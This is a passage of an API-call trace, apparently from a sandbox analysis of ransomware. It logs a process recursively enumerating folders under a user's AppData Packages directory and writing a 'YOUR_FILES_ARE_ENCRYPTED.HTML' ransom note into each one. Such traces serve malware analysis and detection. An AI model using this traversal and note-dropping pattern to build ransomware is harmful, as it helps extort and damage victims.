dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.646] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.647] CloseHandle (hObject=0x32c) returned 1 [0116.647] GetProcessHeap () returned 0x600000 [0116.647] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.647] GetProcessHeap () returned 0x600000 [0116.647] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.647] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0116.647] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.647] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetHistory") returned 112 [0116.647] GetProcessHeap () returned 0x600000 [0116.647] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0116.647] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetHistory" [0116.647] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0116.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184088, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0116.647] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184088, cFileName="..", cAlternateFileName="")) returned 1 [0116.648] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184088, cFileName="..", cAlternateFileName="")) returned 0 [0116.648] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0116.648] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0116.648] GetProcessHeap () returned 0x600000 [0116.648] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.648] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.649] CloseHandle (hObject=0x32c) returned 1 [0116.649] GetProcessHeap () returned 0x600000 [0116.649] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.649] GetProcessHeap () returned 0x600000 [0116.649] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.649] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="Temp", cAlternateFileName="")) returned 1 [0116.649] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.649] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\Temp") returned 105 [0116.649] GetProcessHeap () returned 0x600000 [0116.649] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0116.649] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\Temp" [0116.649] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\Temp\\*" [0116.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184088, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.654] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184088, cFileName="..", cAlternateFileName="")) returned 1 [0116.654] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184088, cFileName="..", cAlternateFileName="")) returned 0 [0116.654] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.654] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0116.654] GetProcessHeap () returned 0x600000 [0116.654] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.655] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.655] CloseHandle (hObject=0x214) returned 1 [0116.656] GetProcessHeap () returned 0x600000 [0116.656] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.656] GetProcessHeap () returned 0x600000 [0116.656] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.657] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="Temp", cAlternateFileName="")) returned 0 [0116.657] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.657] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0116.657] GetProcessHeap () returned 0x600000 [0116.657] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.658] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.659] CloseHandle (hObject=0x320) returned 1 [0116.659] GetProcessHeap () returned 0x600000 [0116.659] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.659] GetProcessHeap () returned 0x600000 [0116.659] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.659] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0116.660] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.660] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AppData") returned 105 [0116.660] GetProcessHeap () returned 0x600000 [0116.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.660] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AppData" [0116.660] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AppData\\*" [0116.660] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.660] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 1 [0116.661] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 0 [0116.661] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.661] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0116.661] GetProcessHeap () returned 0x600000 [0116.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.662] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.662] CloseHandle (hObject=0x320) returned 1 [0116.663] GetProcessHeap () returned 0x600000 [0116.663] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.663] GetProcessHeap () returned 0x600000 [0116.663] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.663] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0116.663] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.663] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalCache") returned 108 [0116.663] GetProcessHeap () returned 0x600000 [0116.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.664] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalCache" [0116.664] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalCache\\*" [0116.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.664] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 1 [0116.665] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 0 [0116.665] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.665] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0116.665] GetProcessHeap () returned 0x600000 [0116.665] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.665] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.665] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.666] CloseHandle (hObject=0x320) returned 1 [0116.666] GetProcessHeap () returned 0x600000 [0116.666] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.666] GetProcessHeap () returned 0x600000 [0116.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.667] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c5b9fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c5b9fe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c5b9fe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0116.667] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.667] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\LocalState") returned 108 [0116.667] GetProcessHeap () returned 0x600000 [0116.667] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.668] lstrcpyW 